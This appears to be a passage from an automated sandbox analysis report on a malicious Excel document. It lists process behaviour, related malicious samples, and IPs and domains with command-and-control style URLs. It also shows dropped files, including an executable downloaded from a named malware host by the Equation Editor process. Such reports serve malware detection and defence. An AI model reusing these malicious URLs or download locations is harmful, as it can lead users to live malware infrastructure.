                                                                                                                                                              • Number of executed functions: 128
                                                                                                                                                              • Number of non-executed functions: 78
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsx
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              16:59:09API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                              16:59:11API Interceptor144x Sleep call for process: vbc.exe modified
                                                                                                                                                              16:59:47API Interceptor217x Sleep call for process: NAPSTAT.EXE modified
                                                                                                                                                              17:00:17API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              192.3.122.17701efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • will.kasraz.com/a/d.dot
                                                                                                                                                              01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • will.kasraz.com/a/d.dot
                                                                                                                                                              103.5.116.13274ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com/8u3b/?EzrxUr=PWNBDH2hPCb1us8Ao8B+54WayNfcYj50QVchuC7xNQJC497qOyaPHph0Z/JAkFEaPJmxv/9Dmg==&0VMt8D=3fJTbJlpxpVT_2d0
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com/8u3b/?9rwxC4Lh=PWNBDH2hPCb1us8Ao8B+54WayNfcYj50QVchuC7xNQJC497qOyaPHph0Z/J570kZBf62v/9E1Q==&o2=iN68aFPHs
                                                                                                                                                              198.54.117.210PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.clickqrcoaster.com/fcn/?9rmHOtA=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&oZ6l=p4spVBAXTFvt5vX0
                                                                                                                                                              Swift Copy#0002.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.poetic.digital/ve9m/?-Z2D=HLd+x3tnWKfUmvtqbbdD8OVjrdMutxNaTSB4wP+X1AEdnyAqpqKn0onUymDEtQ5Ktala&4h5=k2JX5xRHxZU0PLap
                                                                                                                                                              CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.switcheo.finance/uwec/?PbytEF=mHF01N2po0q&MDKDR=3cOH6CfanC83AmjC2DHvKlrvSwO+w2vUbHn8ip8BNDYWXhTumYa46lUfQ1Zud/zuYtNlxg==
                                                                                                                                                              PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.growth.run/edbs/?MnZ=GXLpz&LZ9p=lamNpoAFA21WPgOJ/0ke3JXhlVE4g80b7bt0OZ5VRWf+PcQquiWcaIC6Gn9TZ94KCxj9
                                                                                                                                                              evaoRJkeKU.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.selfimprovementinterface.com/lhc/?r6=H61yjek3NQPZ1i7/SVuwE0aK/qCQUYqKwvJUcnOovW1UxK4XrP3lDzJIJTbIEYNHhneA&YL0=8pN4q
                                                                                                                                                              salescontractv2draft.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.switcheo.finance/uwec/?5jiPPdy=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTTZoFermUb5EoT+GMw==&KneXK=hrtTrR-Hj2Hxpx6p
                                                                                                                                                              rErRI1Ktbf.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.selfimprovementinterface.com/lhc/?t8r=FrglXBN&NBZl=H61yjek3NQPZ1i7/SVuwE0aK/qCQUYqKwvJUcnOovW1UxK4XrP3lDzJIJTbIEYNHhneA
                                                                                                                                                              kAO6QPQsZF.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ifdca.com/m0rc/?kfLlav=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otESCz2qCMY&gL=ybFLLT9hAnjhNt
                                                                                                                                                              yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.manconnectr.services/gts/?uDHXm=9IMft3k8F713VnQnF9zp3jMOr/Batv3t6t3TBX5Dnn3sWNexcE+V9+jLQfTIIs3IwpNq&8p=2dRTAnw8b
                                                                                                                                                              POWPO-201209-248-INV10981-PI100833-Waycos20210225.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.adigitaldemocracy.computer/smd0/?CBZpb=n0GxdzhhB&ZvaxiLAp=/m0nPq14FUGSlul8fJdZDW8lKKfn+gzot6xiXfOrt7ZYHXf83Wmhv0cqByGHV5dueqIwmg==
                                                                                                                                                              orDEANQA70mnjpD.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.thenonfictionauthor.com/kzl/?AdhDQXr=Gyn7/ty3DfyImuCS3aJAaEklGXzzwEUNFIImI8Z2ddRHRD+aqWZPG+GUA8BmTtk7xAZy1GghOw==&pP=EFQtiVMhhH5L
                                                                                                                                                              Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.chelseybalassi.com/pkfa/?kRm0q=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KBTtOUqpAtQ&P0D=AdpLplk
                                                                                                                                                              Smart Tankers Qoute no. 2210.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.localeastbay.com/xle/?LFQLRZ=E0pVt0SD/c6cjw8B7rNDtvuitkx+mv2nZsT+uLlUSSE0kMh9c3r1xcNAL16Y1e/bK4TSnA==&1brt=kvgpkNCXb4
                                                                                                                                                              NWvnpLrdx4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.pendekar-qq.xyz/da0a/?0pn=3idupu15OOeW9zfMjMdgut9mS0cjf15hkTqMaFLLCpXgHo77noPJVLOm8UPOedJyS0V+rQvXng==&D6Ap=ZfoTzbtx3ht
                                                                                                                                                              LbxEsmtt9T.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.winton.school/xle/?CRi=_DKdFjZ&b6=63sZlfPxpYub/3CVsezcfMIXyleq3IuiloyLDgT7uRWOzgoiAeet3YMsJrqLIatkyaHP
                                                                                                                                                              j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.accessible.legal/csv8/?R0G=dhrxP2v88TRtsx&Bz=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx+vzGuPbqxiE
                                                                                                                                                              ins.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.seak.xyz/uds2/?RZBxhprX=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpukeTtFbirQ9P&2dnDH=hpyPs2spXhIX0dH0
                                                                                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ido.lgbt/rbg/?XbfTxRJp=hIAXe7F1z8L2t8PUj0dDc1RC7hWn72SE/UIhq0x6lMU4/eENencvYGY83Ko+Mq4roz52&Ez=ltxdLDm
                                                                                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.doggybargains.com/nki/?-Z1l=TOQH/B74eY+lLUBsPfn02/AyeWt7NTM3T5MQ11peB6QiRzS5xhI/XYvznnh8++9i+D38b9u5AQ==&5ju=UlSpo
                                                                                                                                                              bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.melaninswagger.com/2bb/?QDK=LleDzhh0FB3X&JtO=JOwLIjZiq2GNu+Jzxas6FSG4+h7nxGCMl3lRW3DKuz7LNyZoo5mrJ0KVtcpv9YkCbORqSXqerA==

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              parkingpage.namecheap.comw73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              REVISED PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              z5Wqivscwd.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              register.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              24032130395451.pdf .exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              PO17439.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.215
                                                                                                                                                              pdf Re revised PI 900tons.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.216
                                                                                                                                                              YJgdGYWCni.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Passport_ID_jpg.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Taekwang Quote - 210421_001.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              1400000004-arrival.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.216
                                                                                                                                                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.210
                                                                                                                                                              www.arfjkacsgatfzbazpdth.com74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              will.kasraz.com01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.177
                                                                                                                                                              01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.177
                                                                                                                                                              cdl-lb-1356093980.us-east-1.elb.amazonaws.comofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 18.205.135.125
                                                                                                                                                              CIVIP-8287377.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.165.198.12

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              AMAZON-AESUSpresentation.jarGet hashmaliciousBrowse
                                                                                                                                                              • 34.202.206.65
                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                              • 34.202.206.65
                                                                                                                                                              heUGqZXAJv.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.17.5.224
                                                                                                                                                              2bb0000.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.16.249.42
                                                                                                                                                              2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                              • 23.21.48.44
                                                                                                                                                              SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 54.243.154.178
                                                                                                                                                              MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.204.119.115
                                                                                                                                                              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 54.163.9.216
                                                                                                                                                              detection.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.212.215.225
                                                                                                                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                              • 52.202.22.6
                                                                                                                                                              #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                              • 23.21.53.13
                                                                                                                                                              OB74.vbsGet hashmaliciousBrowse
                                                                                                                                                              • 54.91.196.22
                                                                                                                                                              3e98fa2d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.235.83.248
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 3.227.195.104
                                                                                                                                                              0429_1556521897736.doc_berd.dllGet hashmaliciousBrowse
                                                                                                                                                              • 54.225.169.203
                                                                                                                                                              KnAY2OIPI3Get hashmaliciousBrowse
                                                                                                                                                              • 54.161.176.221
                                                                                                                                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              pVrqrGltiL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.233.171.147
                                                                                                                                                              b3516494_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              AS-COLOCROSSINGUSPO.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.207.121
                                                                                                                                                              Refno.191938.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.213.57
                                                                                                                                                              tetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 23.94.41.215
                                                                                                                                                              sample04052021.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.199
                                                                                                                                                              Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.207.82
                                                                                                                                                              29f6b8ff_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              33075048_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              bf10a8ed_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              b6379798_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              ef2ccb56_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              57e4e9e9_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              49aa838c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              b3976dff_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              cdce1cb3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              faf01c9e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              2044d4ec_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              df024c6e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              87be565b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              a856bf89_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              0a71c578_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              ABOVE-AS-APAboveNetCommunicationsTaiwanTW74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              INTERQGMOInternetIncJPc647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 157.7.44.172
                                                                                                                                                              bdc0c7d3_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.72
                                                                                                                                                              DHL_S390201.exeGet hashmaliciousBrowse
                                                                                                                                                              • 118.27.99.28
                                                                                                                                                              AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              SOA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.52.102
                                                                                                                                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              MrV6Do8tZr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              WGv1KTwWP5.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              Fax scanned 14-04-2021.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              INV#609-005.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.185.226

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Reputation:low
                                                                                                                                                              IE Cache URL:http://will.kasraz.com/a/so.exe
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@..................................<..O....@.......................`....................................................... ............... ..H............text...,.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......,n...m...............`...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o....(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4BFD36.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B2ABFC3.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):653280
                                                                                                                                                              Entropy (8bit):2.8986392617606107
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:f34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:/4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                              MD5:08C97F7538AB65F8E3F78D0787C3AF7A
                                                                                                                                                              SHA1:C59A376CF9FE5B44D580891747B383DA724F144F
                                                                                                                                                              SHA-256:EF439381C92C42989797C8B0D7460791156C54AC7FC2BCD741FA6120DFBF80EA
                                                                                                                                                              SHA-512:E61BA4589BAF5BC714B1E16E36AA840FDD5E3BDA16C995D238D87D88299E29D964DB983A84FA726F3CC74C26105D44EF91074381E52D83F307B5D6EF72F759C6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-...-.......-...-..N._..-...-.....l.-...-..N._..-...-. ....yg^..-...-. ............zg^............O...............................X...%...7...................{ .@................C.a.l.i.b.r...............-.X.....-.0.-..2`^........l.-.l.-..{^^......-.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ..E6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7337552
                                                                                                                                                              Entropy (8bit):1.6350000486784952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:mhIww9GjS9WajgfUJt3hIww9GjS9WajgfUJtn:uw9Gkr9w9Gkrn
                                                                                                                                                              MD5:E43D498A7EE295C05D88E063BBB703BD
                                                                                                                                                              SHA1:5EB0D80A489A90AE5C650ACF1EDEB3DD95FA276E
                                                                                                                                                              SHA-256:483BCCB76820466FFFB1BB06D3436D7B79B48F600CCA539FD2F514120CD08D78
                                                                                                                                                              SHA-512:62211CDC58A2D4364077387C9E89C8782A1437FCB2C77C7FF378A8F2FD20C9E99550C4F520473C844EF8A5B5487E615834D7D839D54D57B86B5C1C148A2B2F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........................d....c.. EMF....P.o.....................V...........................fZ..U"..F.....7...7.GDIC........?..^......7.......J.....+...................+.......................+...A. ...........+.......(.....................7.................========================================================================================================================================================================ZZZ}}}................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39E6EE8.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5376
                                                                                                                                                              Entropy (8bit):5.0441612941917615
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:p2NmAZb6pvCa4ukzw+Lv6KbLSNRyBLf2qoCfVYIrxQ2PNrYJf66QpTIZTAo0zQnw:cUvZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy
                                                                                                                                                              MD5:74DB540A0F8EADF65B6CA25FD6B93D18
                                                                                                                                                              SHA1:4E49830309156268990DAC2684DFA479764718FD
                                                                                                                                                              SHA-256:7D07D91D712C32A5E2D8F3EAF68649CF533573F7963E6BE9D834446908DA525E
                                                                                                                                                              SHA-512:572DF79363F7E2CB187C9024B9FFFB0D5168CE1227F7781E2BA056BA1B77800AE0E193CDE350021D70ACABA8B0E6CBE1A4D290817006B7F2C8B541EBC233D6CF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I...................................................av.V..O.f.f.i.c.e.1.2.\.E.X.C.E.L.........gY.s........D.jj..........av.{Yu.eau ...t...0...8{Yu.T.v..Yu.... ... ..../.v.s.w..jj..+...+........v....4...h...,...._u5.....6.4.....v........./.v...w..jj.................Y.s.................V.......gbv........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3E411C9.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
